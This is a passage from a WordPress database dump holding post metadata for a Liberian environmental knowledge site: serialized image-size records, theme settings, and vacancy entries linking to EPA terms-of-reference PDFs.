:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"epa-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"epa-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"epa-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33247,4756,'_wp_old_date','2022-06-22'),(33248,4756,'_thumbnail_id','4757'),(33249,4756,'_edit_last','42'),(33250,4756,'kava_extra_enable_breadcrumbs','inherit'),(33251,4756,'post_formats',''),(33252,4756,'gallery_tab',''),(33253,4756,'kava_extra_gallery_images',''),(33254,4756,'link_tab',''),(33255,4756,'kava_extra_link',''),(33256,4756,'kava_extra_link_target','_blank'),(33257,4756,'quote_tab',''),(33258,4756,'kava_extra_quote_text',''),(33259,4756,'kava_extra_quote_cite',''),(33260,4756,'audio_tab',''),(33261,4756,'kava_extra_audio',''),(33262,4756,'kava_extra_audio_loop','false'),(33263,4756,'kava_extra_audio_autoplay','false'),(33264,4756,'kava_extra_audio_preload','false'),(33265,4756,'video_tab',''),(33266,4756,'kava_extra_video_type','library'),(33267,4756,'kava_extra_video_library',''),(33268,4756,'kava_extra_video_external',''),(33269,4756,'kava_extra_video_poster',''),(33270,4756,'kava_extra_video_width','770'),(33271,4756,'kava_extra_video_height','480'),(33272,4756,'kava_extra_video_loop','false'),(33273,4756,'kava_extra_video_autoplay','false'),(33274,4756,'kava_extra_video_preload','false'),(33275,4759,'_edit_lock','1655896117:42'),(33276,4759,'_last_editor_used_jetpack','block-editor'),(33277,4760,'_wp_attached_file','2022/06/epa-undp.png'),(33278,4760,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:20:\"2022/06/epa-undp.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"epa-undp-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"epa-undp-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"epa-undp-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"epa-undp-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"epa-undp-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"epa-undp-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"epa-undp-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:20:\"epa-undp-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"epa-undp-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:20:\"epa-undp-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:20:\"epa-undp-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33281,4759,'_wp_old_date','2022-06-22'),(33282,4759,'_thumbnail_id','4760'),(33283,4759,'_edit_last','42'),(33284,4759,'kava_extra_enable_breadcrumbs','inherit'),(33285,4759,'post_formats',''),(33286,4759,'gallery_tab',''),(33287,4759,'kava_extra_gallery_images',''),(33288,4759,'link_tab',''),(33289,4759,'kava_extra_link',''),(33290,4759,'kava_extra_link_target','_blank'),(33291,4759,'quote_tab',''),(33292,4759,'kava_extra_quote_text',''),(33293,4759,'kava_extra_quote_cite',''),(33294,4759,'audio_tab',''),(33295,4759,'kava_extra_audio',''),(33296,4759,'kava_extra_audio_loop','false'),(33297,4759,'kava_extra_audio_autoplay','false'),(33298,4759,'kava_extra_audio_preload','false'),(33299,4759,'video_tab',''),(33300,4759,'kava_extra_video_type','library'),(33301,4759,'kava_extra_video_library',''),(33302,4759,'kava_extra_video_external',''),(33303,4759,'kava_extra_video_poster',''),(33304,4759,'kava_extra_video_width','770'),(33305,4759,'kava_extra_video_height','480'),(33306,4759,'kava_extra_video_loop','false'),(33307,4759,'kava_extra_video_autoplay','false'),(33308,4759,'kava_extra_video_preload','false'),(33309,4762,'_edit_lock','1655896424:42'),(33310,4762,'_last_editor_used_jetpack','block-editor'),(33311,4763,'_wp_attached_file','2022/06/lisgis.png'),(33312,4763,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:18:\"2022/06/lisgis.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"lisgis-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"lisgis-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"lisgis-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"lisgis-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:17:\"lisgis-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:18:\"lisgis-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:18:\"lisgis-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:18:\"lisgis-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:18:\"lisgis-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:18:\"lisgis-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:18:\"lisgis-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33315,4762,'_wp_old_date','2022-06-22'),(33316,4762,'_thumbnail_id','4763'),(33317,4762,'_edit_last','42'),(33318,4762,'kava_extra_enable_breadcrumbs','inherit'),(33319,4762,'post_formats',''),(33320,4762,'gallery_tab',''),(33321,4762,'kava_extra_gallery_images',''),(33322,4762,'link_tab',''),(33323,4762,'kava_extra_link',''),(33324,4762,'kava_extra_link_target','_blank'),(33325,4762,'quote_tab',''),(33326,4762,'kava_extra_quote_text',''),(33327,4762,'kava_extra_quote_cite',''),(33328,4762,'audio_tab',''),(33329,4762,'kava_extra_audio',''),(33330,4762,'kava_extra_audio_loop','false'),(33331,4762,'kava_extra_audio_autoplay','false'),(33332,4762,'kava_extra_audio_preload','false'),(33333,4762,'video_tab',''),(33334,4762,'kava_extra_video_type','library'),(33335,4762,'kava_extra_video_library',''),(33336,4762,'kava_extra_video_external',''),(33337,4762,'kava_extra_video_poster',''),(33338,4762,'kava_extra_video_width','770'),(33339,4762,'kava_extra_video_height','480'),(33340,4762,'kava_extra_video_loop','false'),(33341,4762,'kava_extra_video_autoplay','false'),(33342,4762,'kava_extra_video_preload','false'),(33343,4765,'_edit_lock','1655896824:42'),(33344,4765,'_last_editor_used_jetpack','block-editor'),(33345,4766,'_wp_attached_file','2022/06/lla-.png'),(33346,4766,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2022/06/lla-.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"lla--300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"lla--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"lla--768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"lla--370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"lla--150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"lla--230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"lla--400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"lla--370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"lla--570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:16:\"lla--600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"lla--640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33349,4765,'_wp_old_date','2022-06-22'),(33350,4765,'_thumbnail_id','4766'),(33351,4765,'_edit_last','42'),(33352,4765,'kava_extra_enable_breadcrumbs','inherit'),(33353,4765,'post_formats',''),(33354,4765,'gallery_tab',''),(33355,4765,'kava_extra_gallery_images',''),(33356,4765,'link_tab',''),(33357,4765,'kava_extra_link',''),(33358,4765,'kava_extra_link_target','_blank'),(33359,4765,'quote_tab',''),(33360,4765,'kava_extra_quote_text',''),(33361,4765,'kava_extra_quote_cite',''),(33362,4765,'audio_tab',''),(33363,4765,'kava_extra_audio',''),(33364,4765,'kava_extra_audio_loop','false'),(33365,4765,'kava_extra_audio_autoplay','false'),(33366,4765,'kava_extra_audio_preload','false'),(33367,4765,'video_tab',''),(33368,4765,'kava_extra_video_type','library'),(33369,4765,'kava_extra_video_library',''),(33370,4765,'kava_extra_video_external',''),(33371,4765,'kava_extra_video_poster',''),(33372,4765,'kava_extra_video_width','770'),(33373,4765,'kava_extra_video_height','480'),(33374,4765,'kava_extra_video_loop','false'),(33375,4765,'kava_extra_video_autoplay','false'),(33376,4765,'kava_extra_video_preload','false'),(33377,4768,'_edit_lock','1655897087:42'),(33378,4768,'_last_editor_used_jetpack','block-editor'),(33379,4769,'_wp_attached_file','2022/06/lla-arcelor.png'),(33380,4769,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:23:\"2022/06/lla-arcelor.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"lla-arcelor-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"lla-arcelor-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"lla-arcelor-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"lla-arcelor-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:22:\"lla-arcelor-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:23:\"lla-arcelor-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:23:\"lla-arcelor-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:23:\"lla-arcelor-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:23:\"lla-arcelor-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:23:\"lla-arcelor-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:23:\"lla-arcelor-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33383,4768,'_wp_old_date','2022-06-22'),(33384,4768,'_thumbnail_id','4769'),(33385,4768,'_edit_last','42'),(33386,4768,'kava_extra_enable_breadcrumbs','inherit'),(33387,4768,'post_formats',''),(33388,4768,'gallery_tab',''),(33389,4768,'kava_extra_gallery_images',''),(33390,4768,'link_tab',''),(33391,4768,'kava_extra_link',''),(33392,4768,'kava_extra_link_target','_blank'),(33393,4768,'quote_tab',''),(33394,4768,'kava_extra_quote_text',''),(33395,4768,'kava_extra_quote_cite',''),(33396,4768,'audio_tab',''),(33397,4768,'kava_extra_audio',''),(33398,4768,'kava_extra_audio_loop','false'),(33399,4768,'kava_extra_audio_autoplay','false'),(33400,4768,'kava_extra_audio_preload','false'),(33401,4768,'video_tab',''),(33402,4768,'kava_extra_video_type','library'),(33403,4768,'kava_extra_video_library',''),(33404,4768,'kava_extra_video_external',''),(33405,4768,'kava_extra_video_poster',''),(33406,4768,'kava_extra_video_width','770'),(33407,4768,'kava_extra_video_height','480'),(33408,4768,'kava_extra_video_loop','false'),(33409,4768,'kava_extra_video_autoplay','false'),(33410,4768,'kava_extra_video_preload','false'),(33411,4771,'_edit_lock','1655897562:42'),(33412,4771,'_last_editor_used_jetpack','block-editor'),(33413,4772,'_wp_attached_file','2022/06/workshop.png'),(33414,4772,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:20:\"2022/06/workshop.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"workshop-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"workshop-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"workshop-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"workshop-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"workshop-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"workshop-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"workshop-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:20:\"workshop-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"workshop-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:20:\"workshop-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:20:\"workshop-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33417,4771,'_wp_old_date','2022-06-22'),(33418,4771,'_thumbnail_id','4772'),(33419,4771,'_edit_last','42'),(33420,4771,'kava_extra_enable_breadcrumbs','inherit'),(33421,4771,'post_formats',''),(33422,4771,'gallery_tab',''),(33423,4771,'kava_extra_gallery_images',''),(33424,4771,'link_tab',''),(33425,4771,'kava_extra_link',''),(33426,4771,'kava_extra_link_target','_blank'),(33427,4771,'quote_tab',''),(33428,4771,'kava_extra_quote_text',''),(33429,4771,'kava_extra_quote_cite',''),(33430,4771,'audio_tab',''),(33431,4771,'kava_extra_audio',''),(33432,4771,'kava_extra_audio_loop','false'),(33433,4771,'kava_extra_audio_autoplay','false'),(33434,4771,'kava_extra_audio_preload','false'),(33435,4771,'video_tab',''),(33436,4771,'kava_extra_video_type','library'),(33437,4771,'kava_extra_video_library',''),(33438,4771,'kava_extra_video_external',''),(33439,4771,'kava_extra_video_poster',''),(33440,4771,'kava_extra_video_width','770'),(33441,4771,'kava_extra_video_height','480'),(33442,4771,'kava_extra_video_loop','false'),(33443,4771,'kava_extra_video_autoplay','false'),(33444,4771,'kava_extra_video_preload','false'),(33447,4776,'_edit_lock','1657290212:42'),(33448,4776,'_last_editor_used_jetpack','block-editor'),(33449,4777,'_wp_attached_file','2022/07/redd.png'),(33450,4777,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2022/07/redd.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"redd-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"redd-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"redd-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"redd-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"redd-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"redd-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"redd-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"redd-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"redd-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:16:\"redd-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"redd-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33451,4777,'_wp_attachment_image_alt','Consortium Members and implementing partners of REDD+ projects at the Nature Compact office in Lakpazee, Monrovia'),(33454,4776,'_thumbnail_id','4777'),(33455,4776,'_edit_last','42'),(33456,4776,'kava_extra_enable_breadcrumbs','inherit'),(33457,4776,'post_formats',''),(33458,4776,'gallery_tab',''),(33459,4776,'kava_extra_gallery_images',''),(33460,4776,'link_tab',''),(33461,4776,'kava_extra_link',''),(33462,4776,'kava_extra_link_target','_blank'),(33463,4776,'quote_tab',''),(33464,4776,'kava_extra_quote_text',''),(33465,4776,'kava_extra_quote_cite',''),(33466,4776,'audio_tab',''),(33467,4776,'kava_extra_audio',''),(33468,4776,'kava_extra_audio_loop','false'),(33469,4776,'kava_extra_audio_autoplay','false'),(33470,4776,'kava_extra_audio_preload','false'),(33471,4776,'video_tab',''),(33472,4776,'kava_extra_video_type','library'),(33473,4776,'kava_extra_video_library',''),(33474,4776,'kava_extra_video_external',''),(33475,4776,'kava_extra_video_poster',''),(33476,4776,'kava_extra_video_width','770'),(33477,4776,'kava_extra_video_height','480'),(33478,4776,'kava_extra_video_loop','false'),(33479,4776,'kava_extra_video_autoplay','false'),(33480,4776,'kava_extra_video_preload','false'),(33481,4779,'_last_editor_used_jetpack','classic-editor'),(33482,4779,'_edit_lock','1657898909:42'),(33483,4779,'_edit_last','42'),(33484,4780,'_wp_attached_file','2022/07/ToR-for-developing-TORs-High-resolution-Multi-criteria-vulnerability-assessment.pdf'),(33485,4779,'_wp_page_template','default'),(33486,4779,'closed_date','2022-07-28'),(33487,4779,'owner','EPA'),(33488,4779,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/07/ToR-for-developing-TORs-High-resolution-Multi-criteria-vulnerability-assessment.pdf'),(33489,4785,'_last_editor_used_jetpack','classic-editor'),(33490,4785,'_edit_lock','1658398810:42'),(33491,4786,'_wp_attached_file','2022/07/TERMS-OF-REFERENCE-FOR-VIDEO-DOCUMENTARY-2022.pdf'),(33492,4785,'_edit_last','42'),(33493,4785,'_wp_page_template','default'),(33494,4785,'_wp_old_date','2022-07-20'),(33495,4785,'closed_date','2022-07-15'),(33496,4785,'owner','EPA'),(33497,4785,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/07/TERMS-OF-REFERENCE-FOR-VIDEO-DOCUMENTARY-2022.pdf'),(33498,4789,'_wp_attached_file','2022/07/small-logo.png'),(33499,4789,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:22:\"2022/07/small-logo.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"small-logo-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"small-logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"small-logo-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"small-logo-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"small-logo-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"small-logo-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:22:\"small-logo-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";